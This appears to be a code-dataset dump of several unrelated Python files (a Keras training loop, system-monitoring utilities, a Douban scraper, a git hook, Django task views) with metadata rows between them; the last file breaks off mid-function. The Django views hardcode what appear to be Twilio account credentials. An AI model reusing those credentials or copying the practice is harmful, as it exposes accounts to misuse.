dev_loss += dev_metrics[0]
# for accuracy
prob = model.predict_on_batch([embed_index, hash_index, pos])
for i, l in enumerate(length):
predict_label = np_utils.categorical_probas_to_classes(prob[i])
correct_predict += np.sum(predict_label[:l]==label[i][:l])
all_predict += np.sum(length)
epcoh_accuracy = float(correct_predict)/all_predict
all_dev_accuracy.append(epcoh_accuracy)
all_dev_loss.append(dev_loss)
if epcoh_accuracy>=best_accuracy:
best_accuracy = epcoh_accuracy
best_epoch = epoch
end = datetime.now()
model.save('%s/model_epoch_%d.h5'%(folder_path, epoch), overwrite=True)
print('epoch %d end at %s'%(epoch, str(end)))
print('epoch %d train loss: %f'%(epoch, train_loss))
print('epoch %d dev loss: %f'%(epoch, dev_loss))
print('epoch %d dev accuracy: %f'%(epoch, epcoh_accuracy))
print('best epoch now: %d\n'%best_epoch)
log.write('epoch %d end at %s\n'%(epoch, str(end)))
log.write('epoch %d train loss: %f\n'%(epoch, train_loss))
log.write('epoch %d dev loss: %f\n'%(epoch, dev_loss))
log.write('epoch %d dev accuracy: %f\n'%(epoch, epcoh_accuracy))
log.write('best epoch now: %d\n\n'%best_epoch)
end_time = datetime.now()
print('train end at %s\n'%str(end_time))
log.write('train end at %s\n\n'%str(end_time))
timedelta = end_time - start_time
print('train cost time: %s\n'%str(timedelta))
print('best epoch last: %d\n'%best_epoch)
log.write('train cost time: %s\n\n'%str(timedelta))
log.write('best epoch last: %d\n\n'%best_epoch)
plot.plot_loss(all_train_loss, all_dev_loss, folder_path=folder_path, title='%s'%model_name)
plot.plot_accuracy(all_dev_accuracy, folder_path=folder_path, title='%s'%model_name)
| mit | 4,881,834,216,791,345,000 | 33.963351 | 157 | 0.688829 | false | 3.08168 | false | false | false |
dtklein/vFense | tp/src/plugins/monit/utils.py | 1 | 8850 | import datetime
import time
import _db
from _db import Collection, Master
from vFense.db.client import r, db_create_close
AgentStatsKey = 'monit_stats'
AgentCollection = 'agents'
class MonitorKey():
Memory = u'memory'
FileSystem = u'file_system'
Cpu = u'cpu'
Timestamp = u'timestamp'
class Monitor():
"""
Main monitoring class to manage data.
"""
@staticmethod
def save_memory_data(agent=None, data=None):
"""Saves memory data.
Args:
agent: The agent id the data belongs to.
data: Basic data type (str, int, list, dict, etc) to save as is.
"""
if not data or not agent:
return None
data = Monitor._totalfy(data)
result = _db._save_data_point(
agent=agent, collection=Collection.Memory, data=data
)
return result
@staticmethod
def save_cpu_data(agent=None, data=None):
"""Saves cpu data.
Args:
agent: The agent id the data belongs to.
data: Basic data type (str, int, list, dict, etc) to save as is.
"""
if not data or not agent:
return None
result = _db._save_data_point(
agent=agent, collection=Collection.Cpu, data=data
)
return result
@staticmethod
def save_file_system_data(agent=None, data=None):
"""Saves file system data.
"""
if not data or not agent:
return None
new_data = []
for fs in data:
new_data.append(Monitor._totalfy(fs))
result = _db._save_data_point(
agent=agent, collection=Collection.FileSystem, data=new_data
)
return result
@staticmethod
def get_memory_data_since(agent=None, date_time=None):
"""Gets all the memory data.
Args:
agent: The agent id the data belongs to.
date_time: A datetime to get all data since.
Returns:
A list of data points. None otherwise.
"""
if (
not agent
or not date_time
or not isinstance(date_time, datetime.datetime)
):
return None
timestamp = date_time.strftime('%s')
return _db._get_data_points_since(
agent=agent, collection=Collection.Memory, timestamp=timestamp
)
@staticmethod
def get_cpu_data_since(agent=None, date_time=None):
"""Gets all the cpu data.
Args:
agent: The agent id the data belongs to.
date_time: A datetime to get all data since.
Returns:
A list of data points. None otherwise.
"""
if (
not agent
or not date_time
or not isinstance(date_time, datetime.datetime)
):
return None
timestamp = date_time.strftime('%s')
return _db._get_data_points_since(
agent=agent, collection=Collection.Cpu, timestamp=timestamp
)
@staticmethod
def get_file_system_data_since(agent=None, date_time=None):
"""Gets all the file system data.
Args:
agent: The agent id the data belongs to.
date_time: A datetime to get all data since.
Returns:
A list of data points. None otherwise.
"""
if (
not agent
or not date_time
or not isinstance(date_time, datetime.datetime)
):
return None
timestamp = date_time.strftime('%s')
return _db._get_data_points_since(
agent=agent, collection=Collection.FileSystem, timestamp=timestamp
)
@staticmethod
def _totalfy(data):
try:
data['total'] = int(data['free']) + int(data['used'])
except Exception as e:
data['total'] = 0
return data
@staticmethod
@db_create_close
def get_agent_memory_stats(agent=None, conn=None):
"""Gets memory stats directly from the agents collection.
Args:
agent: Agent id to retrieve stats from.
"""
if not agent:
return None
try:
stats = (
r
.table(AgentCollection)
.get(agent)
.pluck(AgentStatsKey)
.run(conn)
)
stats = stats[AgentStatsKey]
if stats:
memory = stats[MonitorKey.Memory]
memory[MonitorKey.Timestamp] = stats[MonitorKey.Timestamp]
return memory
except Exception as e:
# TODO: log here
pass
return None
@staticmethod
@db_create_close
def get_agent_cpu_stats(agent=None, conn=None):
"""Gets cpu stats directly from the agents collection.
Args:
agent: Agent id to retrieve stats from.
"""
if not agent:
return None
try:
stats = (
r
.table(AgentCollection)
.get(agent)
.pluck(AgentStatsKey)
.run(conn)
)
stats = stats[AgentStatsKey]
if stats:
cpu = stats[MonitorKey.Cpu]
cpu[MonitorKey.Timestamp] = stats[MonitorKey.Timestamp]
return cpu
except Exception as e:
# TODO: log here!!
pass
return None
@staticmethod
@db_create_close
def get_agent_file_system_stats(agent=None, conn=None):
"""Gets file_system stats directly from the agents collection.
Args:
agent: Agent id to retrieve stats from.
"""
if not agent:
return None
try:
stats = (
r
.table(AgentCollection)
.get(agent)
.pluck(AgentStatsKey)
.run(conn)
)
stats = stats[AgentStatsKey]
if stats:
fs = []
for _fs in stats[MonitorKey.FileSystem]:
_fs[MonitorKey.Timestamp] = stats[MonitorKey.Timestamp]
fs.append(_fs)
return fs
except Exception as e:
# TODO: log here
pass
return None
def save_monitor_data(agent=None, **kwargs):
"""A catch all function to save monitoring data.
Parameters are basic data type (str, int, list, dict, etc) to save as is.
Args:
agent: The agent id the data belongs to.
kwargs: Keys corresponding to monitor.MonitorKey
Returns:
True if data was saved, False otherwise.
"""
if not agent:
return None
memory = kwargs.get(MonitorKey.Memory)
fs = kwargs.get(MonitorKey.FileSystem)
cpu = kwargs.get(MonitorKey.Cpu)
_mem = None
_cpu = None
_fs = None
if (
not memory
and not cpu
and not fs
):
return None
result = {}
if memory:
_mem = Monitor.save_memory_data(agent, memory)
result[MonitorKey.Memory] = _mem
if cpu:
_cpu = Monitor.save_cpu_data(agent, cpu)
result[MonitorKey.Cpu] = _cpu
if fs:
_fs = Monitor.save_file_system_data(agent, fs)
result[MonitorKey.FileSystem] = _fs
return result
def get_monitor_data_since(agent=None, timestamp=None):
"""A catch all function to get all monitoring data.
Gets the monitoring data since the arguments provided. If all are None,
then the default of 5 hours is used.
Args:
agent: The agent id the data belongs to.
timestamp: Unix timestamp to get data since.
Returns:
A dict with monitor.MonitorKey key. It's possible for values to be None.
"""
_mem = Monitor.get_memory_data_since()
_cpu = Monitor.get_cpu_data_since()
_fs = Monitor.get_file_system_data_since()
data = {}
data[MonitorKey.Memory] = _mem
data[MonitorKey.Cpu] = _cpu
data[MonitorKey.FileSystem] = _fs
return data
@db_create_close
def update_agent_monit_stats(agent=None, **kwargs):
memory = kwargs.get(MonitorKey.Memory)
cpu = kwargs.get(MonitorKey.Cpu)
fs = kwargs.get(MonitorKey.FileSystem)
conn = kwargs.get('conn')
agent_stats = {}
stats = {}
stats['memory'] = Monitor._totalfy(memory)
stats['cpu'] = cpu
stats['timestamp'] = int(time.time())
fs_list = []
for _fs in fs:
fs_list.append(Monitor._totalfy(_fs))
stats['file_system'] = fs_list
agent_stats[AgentStatsKey] = stats
(
r
.table(AgentCollection)
.get(agent)
.update(agent_stats)
.run(conn, no_reply=True)
)
| lgpl-3.0 | -7,869,110,874,207,492,000 | 20.585366 | 80 | 0.543277 | false | 4.260953 | false | false | false |
Zubieta/CPP | CodeSignal/Arcade/The_Core/Level_06_Labyrinth_Of_Nested_Loops/044_Is_Sum_Of_Consecutive_2.py | 3 | 1278 | # https://app.codesignal.com/arcade/code-arcade/labyrinth-of-nested-loops/EQSjA5PRfyHueeNkj
def isSumOfConsecutive2(n):
# Find the number of ways to express n as a sum of some (at least two)
# consecutive positive integers.
# e.g. isSumOfConsecutive2(9) == 2, 2+3+4==9, 4+5==9.
# count = 0
# for i in range(0, n):
# for j in range(i, n):
# if sum(range(i, j)) == n:
# count += 1
# return count
combinations = set([])
# Consecutive values that add up to a certain number have the number divided by the
# amount of values at their center.
# e.g. 9/3 ~ 2, [3], 4
# 9/2 ~ 4, [4.5], 5
for i in range(2, n + 1):
# Find the value at the center.
m = n//i
v = []
# Find the values at both sides of the centers.
for j in range(i):
if i % 2 == 0:
value = m - i//2 + 1 + j
else:
value = m - i//2 + j
if value > 0:
v.append(value)
# Check if all values add up to original value.
if sum(v) == n:
combinations.add(",".join(map(str, v)))
# Return possible amount of combinations of consecutive numbers that add up to n.
return len(combinations)
| mit | -685,268,750,411,784,600 | 34.5 | 91 | 0.535211 | false | 3.363158 | false | false | false |
blacksph3re/alastair | cooking/helpers.py | 1 | 2487 | import csv, codecs
import math
from django.core.urlresolvers import resolve
from django.db.models import F, ExpressionWrapper, FloatField, IntegerField, CharField, Case, When, Sum, Func, Min, Q
from django.template.defaulttags import register
from .models import Project, Ingredient, Inventory_Item, MEASUREMENTS, Receipe, Meal_Receipe
def validate_positive(value):
if(value < 0):
raise ValidationError('Please enter a positive value', code='negative-value')
def validate_greater_zero(value):
if(value <= 0):
raise ValidationError('Please enter a value greater than zero', code='not-zero')
MEASUREMENTS = (
('ml', 'Milliliter'),
('g', 'Gram'),
('n', 'Piece'),
)
@register.filter(name='get_item')
def get_item(dictionary, key):
return dictionary.get(key)
def conv_measurement(measurement, quantity):
if(measurement == 'n'):
if(quantity == 1):
return 'piece'
return 'pieces'
return measurement
def prepareContext(request):
context = {}
if('activate_project' in request.GET):
try:
request.session['active_project']=int(request.GET.get('activate_project'))
except:
try:
del request.session['active_project']
except:
pass
try:
context['active_project'] = Project.objects.get(id=request.session['active_project'])
except:
pass
context['active_page'] = resolve(request.path_info).url_name
context['pagetitle'] = context['active_page']
return context
## Ugly thing: if we can import the python2-module, define stuff...
try:
import cStringIO
def _smallhelpforunicode(arg):
if(arg == None):
return ''
return unicode(arg)
class UnicodeWriter:
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
# Redirect output to a queue
self.queue = cStringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
self.writer.writerow([_smallhelpforunicode(s).encode("utf-8") for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row)
except:
pass | gpl-2.0 | -1,328,513,066,590,342,000 | 26.340659 | 117 | 0.702051 | false | 3.26378 | false | false | false |
emsrc/timbl-tools | test/test_client.py | 1 | 5050 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test TimblClient class
"""
import logging
import unittest
from tt.server import TimblServer
from tt.client import TimblClient, TimblClientError
from common import DATA_DIR
SERVER = None
def start_timbl_server():
global SERVER
options = "-f {0}/dimin.train".format(DATA_DIR)
SERVER = TimblServer(timbl_opts=options)
SERVER.start()
class Test_TimblClient(unittest.TestCase):
def setUp(self):
if not SERVER:
start_timbl_server()
self.client = TimblClient(SERVER.port)
self.client.connect()
def test_disconnect(self):
self.client.disconnect()
self.assertRaises(TimblClientError, self.client.query)
self.assertFalse(self.client.socket)
def test_reconnect(self):
self.client.reconnect()
self.client.query()
def test_connection_timeout(self):
# send incomplete command so server does not reply
self.client.socket.settimeout(1)
self.assertRaises(TimblClientError,
self.client.set,
"-k")
self.client.socket.settimeout(10)
def test_query(self):
# repeat multiple times, because recv in multiple parts occurs rarely
for i in range(25):
status = self.client.query()
## print status
self.assertEqual(status["NEIGHBORS"], "1")
def test_set(self):
self.client.set("-k 10 -d IL")
status = self.client.query()
self.assertEqual(status["NEIGHBORS"], "10")
self.assertEqual(status["DECAY"], "IL")
self.client.set("-k 1 -d Z")
def test_set_error(self):
self.assertRaises(TimblClientError,
self.client.set,
"-w 1")
def test_classify(self):
"""
Exhaustively test classification with any combination of the verbose
output options +/-vdb (distribution), +/-vdi (distance) and +/-vn
(neighbours). The +/-vk seems to be unsupported, as it cannot be "set"
through the server
"""
self.client.set("-k10")
for db in "+vdb -vdb".split():
for di in "+vdi -vdi".split():
for vn in "+vn -vn".split():
self.client.set(db + " " + di + " " + vn)
for i, inst in enumerate(open(DATA_DIR + "/dimin.train")):
if i > 10: break
result = self.client.classify(inst)
self.assertTrue(result.has_key("CATEGORY"))
if db == "+vdb":
self.assertTrue(result.has_key("DISTRIBUTION"))
else:
self.assertFalse(result.has_key("DISTRIBUTION"))
if di == "+vdi":
self.assertTrue(result.has_key("DISTANCE"))
else:
self.assertFalse(result.has_key("DISTANCE"))
if vn == "+vn":
self.assertTrue(result.has_key("NEIGHBOURS"))
else:
self.assertFalse(result.has_key("NEIGHBOURS"))
self.client.set("-k1 -vdb -vdi -vn")
def test_classify_error(self):
self.assertRaises(TimblClientError,
self.client.classify,
"x, x, x, x")
def test_log(self):
# quick & global config of logging system so output of loggers
# goes to stdout
logging.basicConfig(level=logging.DEBUG,
format="%(levelname)-8s <%(name)s> :: %(message)s")
self.client = TimblClient(SERVER.port, log_tag="test_log_client")
self.client.connect()
instances = open(DATA_DIR + "/dimin.train").readlines()
for inst in instances[:2]:
self.client.classify(inst)
self.client.query()
self.client.set("+vdb +vdi +vn")
for inst in instances[:2]:
self.client.classify(inst)
try:
self.client.classify("x, x")
except TimblClientError:
pass
try:
self.client.set("-w 1")
except TimblClientError:
pass
self.client.disconnect()
# global reset of logging level
logging.getLogger().setLevel(logging.CRITICAL)
def tearDown(self):
self.client.disconnect()
if __name__ == '__main__':
import sys
sys.argv.append("-v")
unittest.main()
| gpl-3.0 | 3,136,496,633,895,326,000 | 29.065476 | 79 | 0.486931 | false | 4.418198 | true | false | false |
cp4/doubanInterface | src/doubanInterface.py | 2 | 5981 | # -*- coding: utf-8 -*-
import re
import urllib2
import time
import json
class bookIf:
def __init__(self, youth_booklist_url, author_booklist_url):
self.youth_booklist_url = youth_booklist_url
self.author_booklist_url = author_booklist_url
def get_group_booklist(self, group_id):
if group_id != "youth" and group_id != "author":
return None
if group_id == "youth":
if not self.youth_booklist_url:
return None
else:
return self.__get_douban_booklist(self.youth_booklist_url)
if group_id == "author":
if not self.author_booklist_url:
return None
else:
return self.__get_douban_booklist(self.author_booklist_url)
def get_member_booklist(self, member_id, list_type = 'wish'):
root_url = "http://book.douban.com/people/" + member_id
if list_type == "wish":
full_url = root_url + "/wish"
return self.__get_douban_people_readlist(full_url, False) # for wish list, book rating is meaningless, False for not get rating.
elif list_type == "reading":
full_url = root_url + "/do"
return self.__get_douban_people_readlist(full_url)
elif list_type == "done":
full_url = root_url + "/collect"
return self.__get_douban_people_readlist(full_url)
else:
return None
def get_book_info(self, book_id):
root_api = 'https://api.douban.com/v2/book/'
api = root_api + book_id
response = urllib2.urlopen(api)
book_info = json.loads(response.read())
#print book_info['isbn10']
#print book_info['isbn13']
return book_info
def __get_douban_booklist(self, url):
item = 0
total_book_list = []
while True:
full_url = url + "?start={0}&sort=time".format(item)
response = urllib2.urlopen(full_url)
#print "=============================================read page " + str(item/25+1) + "==================================================="
#print urlcheck
html_text = response.read()
#print html_text
#print "===============================================================raw and one line============================================================="
#oneline_html_text = raw_html.replace('\n', ' ').replace('\r', '')
#striped_html = raw_html.strip('\n')
#striped_html = striped_html.strip('\r')
#striped_html = striped_html.strip('\n')
html_text_list = html_text.splitlines()
book_list = []
for i in range(0, len(html_text_list)):
if html_text_list[i].find('<div class="title">') >= 0:
#rematch = re.match(r'(http://book.douban.com/subject/)([0-9]+)(/)', html_text_list[i+1])
rematch = re.search('(?<=subject/)\d+', html_text_list[i+1])
if rematch:
book_id = rematch.group(0)
book_name = html_text_list[i+2].strip()
book_info = {"book_id":"", "book_name":""}
book_info['book_id'] = book_id
book_info['book_name'] = book_name
#print book_info
book_list.append(book_info)
if book_list:
#print book_list
total_book_list += book_list
item += 25
time.sleep(1) #sleep 1 second to avoid being blocked by douban.com for frequent access.
else:
break
#print total_book_list
return total_book_list
def __get_douban_people_readlist(self, url, WANT_RATING = True):
item_num = 0
total_book_list = []
while True:
#print "=============================================read page " + str(item_num/15+1) + "==================================================="
full_url = url + "?start={0}&sort=time".format(item_num)
response = urllib2.urlopen(full_url)
html_text = response.read()
html_text_list = html_text.splitlines()
book_list = []
got_book_title = False # used for search book rating. only after a book title is found, book rating is to be searched.
for html_line in html_text_list:
book_info = {"book_id":"", "book_name":"", "rating":0}
if WANT_RATING and got_book_title:
rate_search = re.search('(<span class="rating)(\d)(-t"></span>)', html_line)
if rate_search:
book_rating = rate_search.group(2)
book_list[len(book_list)-1]["rating"] = int(book_rating)
got_book_title = False
continue
search_result = re.search('(http://book.douban.com/subject/)(\d+)(/)(.+)(title=")(.+)(")', html_line)
if search_result:
book_id = search_result.group(2)
book_name = search_result.group(6)
book_info['book_id'] = book_id
book_info['book_name'] = book_name
book_list.append(book_info)
got_book_title = True
if book_list:
total_book_list += book_list
item_num += 15
#print book_list
time.sleep(1) #sleep 1 second to avoid being blocked by douban.com for frequent access.
else:
break
return total_book_list
| mit | 942,565,085,847,429,100 | 41.721429 | 161 | 0.458452 | false | 4.077028 | false | false | false |
elationfoundation/git_hooks | pre-commit/utils/date_stamp.py | 1 | 1544 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import re
import subprocess
from datetime import datetime
def system(*args, **kwargs):
kwargs.setdefault('stdout', subprocess.PIPE)
proc = subprocess.Popen(args, **kwargs)
out, err = proc.communicate()
return out
def now():
"""Current date-time"""
#return str(datetime.now())[:16]
return datetime.now().strftime('%Y-%m-%d %H:%M')
if __name__ == '__main__':
modified = re.compile('^[ACM]+\s+(?P<name>.*\.py)', re.MULTILINE)
files = modified.findall( system('git', 'status', '--porcelain') )
for name in files:
# watching ruby | python | lua scripts
if re.search(r"(\.py|\.rb|\.lua)$", name):
# current script text
with open(name, 'r') as fd: script = fd.read()
# change modification date
script = re.sub('(@changed\s*:\s+)\d{4}-\d{2}-\d{2} \d{2}:\d{2}',
lambda m: m.group(1) + now(), script)
# change script revision
script = re.sub('(@revision\s*:\s+)(\d+)',
lambda m: m.group(1) + str(int(m.group(2))+1), script)
# change script version
script = re.sub('(__version__\s*=\s*\d+\.\d+\.)(\d+)',
lambda m: m.group(1) + str(int(m.group(2))+1), script)
# write back to script
with open(name, 'w') as fd: fd.write(script)
# add changes to commit
system('git', 'add', name)
sys.exit(0)
| gpl-2.0 | -1,175,021,152,180,080,600 | 31.851064 | 82 | 0.517487 | false | 3.446429 | false | false | false |
hightemp/cappMiniWebServer | temporary/encode.py | 1 | 1624 |
import base64
import os
from os.path import *
aDirectories = ['templates', 'assets']
sCurrentDir = os.path.dirname(os.path.abspath(__file__))
sTempDir = join(sCurrentDir, 'temporary')
def fnEcodeFilesInDir(in_sCurrentPath, in_sTempPath):
for sFileName in os.listdir(in_sCurrentPath):
sAbsolutePath = join(in_sCurrentPath, sFileName)
sAbsoluteTempPath = join(in_sTempPath, sFileName)
print(sAbsolutePath)
if isdir(sAbsolutePath):
if not isdir(sAbsoluteTempPath):
os.makedirs(sAbsoluteTempPath)
fnEcodeFilesInDir(sAbsolutePath, sAbsoluteTempPath)
for sFileName in os.listdir(in_sCurrentPath):
sAbsolutePath = join(in_sCurrentPath, sFileName)
sAbsoluteTempPath = join(in_sTempPath, sFileName)
print(sAbsolutePath)
if isfile(sAbsolutePath):
try:
objReadFileHandler = file(sAbsolutePath, "r")
sBase64Encoded = base64.b64encode(objReadFileHandler.read())
objWriteFileHandler = file(sAbsoluteTempPath + ".base64", "w")
objWriteFileHandler.write(sBase64Encoded)
objWriteFileHandler.close()
objReadFileHandler.close()
except Exception as objException:
print(objException)
for sDirectory in aDirectories:
sAbsolutePath = join(sCurrentDir, sDirectory)
sAbsoluteTempPath = join(sTempDir, sDirectory)
if isdir(sAbsolutePath):
if not isdir(sAbsoluteTempPath):
os.makedirs(sAbsoluteTempPath)
fnEcodeFilesInDir(sAbsolutePath, sAbsoluteTempPath) | mit | 5,039,709,232,196,280,000 | 35.931818 | 78 | 0.669951 | false | 3.885167 | false | false | false |
SlashRoot/WHAT | what_apps/do/views.py | 1 | 23210 | from .forms import TaskForm, TaskPrototypeNameForm, TaskPrototypeForm, \
GenerateTaskForm, RestOfTheTaskPrototypeForm
from .models import Task, TaskProgeny, Verb, TaskPrototype, TaskPrototypeProgeny, \
TaskOwnership, TaskResolution, TaskAccessPrototype, TaskAccess, Protocol
from django import forms
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User, Group
from django.contrib.contenttypes.models import ContentType
from django.db.models import Max, Count, Q
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect, get_object_or_404
from django.template import loader, Context, Template, RequestContext
from django.utils import simplejson
from django.utils.datastructures import MultiValueDictKeyError
from django.views.decorators.cache import never_cache
from what_apps.presence.models import SessionInfo
from taggit.models import Tag
from twilio.util import TwilioCapability
from what_apps.utility.forms import AutoCompleteField
from what_apps.mellon.models import Privilege, get_privileges_for_user
from what_apps.people.models import GenericParty
from what_apps.social.forms import DrawAttentionAjaxForm, MessageForm
from what_apps.social.models import TopLevelMessage
from what_apps.social.views import post_top_level_message
import stomp
import json
#from twilio.Utils import token
T = ContentType.objects.get_for_model(Task)
@login_required
def landing(request):
tasks = Task.objects.can_be_seen_by_user(request.user).order_by('-created')
manual_tasks = tasks.filter(ownership__isnull = True).exclude(creator__username = "AutoTaskCreator")[:10]
task_messages = TopLevelMessage.objects.filter(content_type = T).order_by('-created')[:7]
return render(request, 'do/do_landing.html', locals())
def public_list(request):
'''
Displays tasks that are viewable with the privilege "Anybody in <group_name>"
'''
if not request.user.is_authenticated():
try:
group_name = request.GET['group']
except MultiValueDictKeyError:
return HttpResponseRedirect('/presence/login?next=/do/public_list/')
group = Group.objects.get(name=group_name)
privilege = get_object_or_404(Privilege, prototype__name="Anybody", jurisdiction=group)
access_objects = TaskAccess.objects.filter(prototype__privilege = privilege)
verbs = Verb.objects.filter(prototypes__instances__resolutions__isnull = True).annotate(num_tasks=Count('prototypes__instances')).order_by('-num_tasks')
else:
verbs = Verb.objects.filter(prototypes__instances__resolutions__isnull = True).annotate(num_tasks=Count('prototypes__instances')).order_by('-num_tasks')
tags = Tag.objects.filter(taggit_taggeditem_items__content_type = T).distinct() #TODO: Privileges
return render(request,
'do/three_column_task_list.html',
locals()
)
@never_cache
@login_required
def big_feed(request):
'''
Look at the big board! They're gettin' ready to clobber us!
'''
user_privileges = get_privileges_for_user(request.user)
tasks = Task.objects.filter(access_requirements__prototype__privilege__in = user_privileges, resolutions__isnull = True).order_by('-created')[:10]
ownerships = list(TaskOwnership.objects.filter(task__resolutions__isnull=True).order_by('-created')[:10])
task_messages = list(TopLevelMessage.objects.filter(content_type = T))
task_resolutions = list(TaskResolution.objects.order_by('-created')[:10])
sessions = list(SessionInfo.objects.order_by('-created')[:10])
task_activity = task_messages + task_resolutions + ownerships + sessions
sorted_task_activity = sorted(task_activity, key=lambda item: item.created, reverse=True)[:10]
activity_list = []
for item in sorted_task_activity:
activity_list.append((item, str(item._meta).split('.')[1]))
return render(request,
'do/do_news_feed.html',
locals()
)
#def three_column_task_list(request):
#
# verbs = Verb.objects.annotate(tasks = Count('prototypes__instances')).order_by('-tasks')
#
# return render(request,
# 'do/three_column_task_list.html',
# locals()
# )
@login_required
def task_profile(request, task_id):
task = get_object_or_404(Task, id = task_id)
#It wasn't bad enough that the actual create form was wet and silly. Now this too. TODO: FIX THIS FUCKER.
user_can_make_new_prototypes = True #TODO: Turn this into an actual privilege assessment
task_prototype_name_form = TaskPrototypeNameForm()
task_prototype_name_form.fields['name'].widget.attrs['class'] = "topLevel" #So that we can recognize it later via autocomplete.
rest_of_the_task_prototype_form = RestOfTheTaskPrototypeForm()
user_privileges = get_privileges_for_user(request.user)
#Wet and silly. TODO: Fix
class SimpleChildForm(forms.Form):
child = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
class SimpleParentForm(forms.Form):
parent = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
task_prototype_form = TaskPrototypeForm()
task_prototype_parent_form = SimpleParentForm()
task_prototype_child_form = SimpleChildForm()
draw_attention_ajax_form = DrawAttentionAjaxForm()
if task.prototype.id == 251 or task.prototype.id == 7:
has_outgoing_call = True
disable_incoming_calls = True
account_sid = "AC260e405c96ce1eddffbddeee43a13004"
auth_token = "fd219130e257e25e78613adc6c003d1a"
capability = TwilioCapability(account_sid, auth_token)
capability.allow_client_outgoing("APd13a42e60c91095f3b8683a77ee2dd05")
#The text of the call recipient will be the name of the person in the case of a tech job. It will be the output of the unicode method of the PhoneNumber in the case of a PhoneCall resolution.
if task.prototype.id == 251:
call_to_name = task.related_objects.all()[0].object.get_full_name()
related_user = task.related_objects.all()[0].object
phone_numbers = task.related_objects.all()[0].object.userprofile.contact_info.phone_numbers.all()
if task.prototype.id == 7:
phone_numbers = [task.related_objects.all()[0].object.from_number]
if task.related_objects.all()[0].object.from_number.owner:
call_to_name = task.related_objects.all()[0].object.from_number.owner
else:
call_to_name = "Phone Number #%s" % (str(task.related_objects.all()[0].object.id))
return render(request,
'do/task_profile.html',
locals()
)
@login_required
def task_prototype_profile(request, task_prototype_id):
'''
Profile page for Task Prototypes.
Allows editing, adding of children or parents, merging / evolving, etc.
'''
tp = get_object_or_404(TaskPrototype, id = task_prototype_id)
task_prototype_form = TaskPrototypeForm(instance=tp)
generate_form = GenerateTaskForm()
return render(request, 'do/task_prototype_profile.html', locals())
#TODO: Security
def own_task(request, task_id):
task = Task.objects.get(id=task_id)
ownership, newly_owned = task.ownership.get_or_create(owner=request.user)
t = loader.get_template('do/task_box.html')
c = RequestContext(request, {'task':task})
if not task.access_requirements.exists(): #We only want to push publically viewable tasks.
#Pushy Stuff
conn = stomp.Connection()
conn.start()
conn.connect()
task_box_dict = {
'verb_id': task.prototype.type.id,
'task_id': task.id,
'box': t.render(c),
}
conn.send(simplejson.dumps(task_box_dict), destination="/do/new_tasks")
response_json = { 'success': 1, 'newly_owned':newly_owned, 'task_id': task.id, 'box': t.render(c) }
return HttpResponse( json.dumps(response_json) )
def get_taskbox_toot_court(request, task_id):
task = Task.objects.get(id=task_id)
return render(request, 'do/task_box.html', locals())
#TODO: Ensure permissions
def create_task(request):
'''
This is one of the worst views I have ever written. -Justin
'''
user_can_make_new_prototypes = True #TODO: Turn this into an actual privilege assessment
task_prototype_name_form = TaskPrototypeNameForm()
task_prototype_name_form.fields['name'].widget.attrs['class'] = "topLevel" #So that we can recognize it later via autocomplete. TODO: DO this in the form object.
rest_of_the_task_prototype_form = RestOfTheTaskPrototypeForm() #TODO: Can we please. please. please make this one object.
#Wet and silly. TODO: Fix
class SimpleChildForm(forms.Form):
child = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
class SimpleParentForm(forms.Form):
parent = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
task_prototype_form = TaskPrototypeForm()
task_prototype_parent_form = SimpleParentForm()
task_prototype_child_form = SimpleChildForm()
user_privileges = get_privileges_for_user(request.user)
try: #WHAT ON GODS GREEN FUCKING SERVER IS HAPPENING HERE
task_prototype_form.fields['name'].initial = request.GET['name']
except:
pass
return render(request, 'do/create_task_prototype.html', locals())
def task_form_handler(request):
'''
Deal with the task form. There's a lot of stuff that needs tweaking in here.
'''
task_prototype_name_form = TaskPrototypeNameForm()
name = request.POST['lookup_name'] #Set the name to the actual lookup field TODO: Yeah... have we checked that this form is valid? Do we care?
#Now let's figure out if they are trying to create a new prototype or just a new task.
try:
this_tp = TaskPrototype.objects.get(name=name)
new = False
except TaskPrototype.DoesNotExist:
verb = Verb.objects.get(id=request.POST['type'])
this_tp = TaskPrototype.objects.create(name=name, type=verb, creator=request.user)
new = True
if not new:
#If this TaskPrototype is not new, all we're going to do is generate its task.
task = this_tp.instantiate(request.user) #Generate the task with the current user as the creator
if new:
#Figure out the relations that were entered. We'll only do that for existing TaskPrototypes.
relations = ['parent', 'child']
for relation in relations:
counter = 1
suffix = relation #For the first iteration, we need it to just say "parent"
while True:
try:
if request.POST['lookup_' + suffix]:
autocompleted_object = task_prototype_name_form.fields['name'].to_python(request.POST[suffix]) #Use the autocopmlete field's to_python method to grab the object
if autocompleted_object:
related_object = autocompleted_object
else: #They didn't successfully autocomplete; looks like we're making an object up unless the name happens to be an exact match.
what_they_typed = request.POST['lookup_' + suffix]
related_object, is_new = TaskPrototype.objects.get_or_create(name = what_they_typed, defaults={'type': this_tp.type, 'creator': request.user})
#At this point in the function, we now know for sure what the related object is. Either they autocompleted, typed a name that matched but didn't autocopmlete, or they're making a new one.
if relation == "child":
parent = this_tp
child = related_object
priority = (counter * 5)
if relation == "parent":
parent = related_object
child = this_tp
current_max_priority_ag = related_object.children.all().aggregate(Max('priority'))
current_max_priority = current_max_priority_ag['priority__max']
try:
priority = int(current_max_priority) + 5 #Try setting the priority to the highest priority plus 5
except TypeError:
priority = 5 #Fuck it, there is no priority at all; we'll start it at 5
TaskPrototypeProgeny.objects.create(parent = parent, child = child, priority = priority )
else:
break
except MultiValueDictKeyError:
break
counter += 1
suffix = relation + str(counter) #Preparing for the second iteration, it says "parent1"
try:
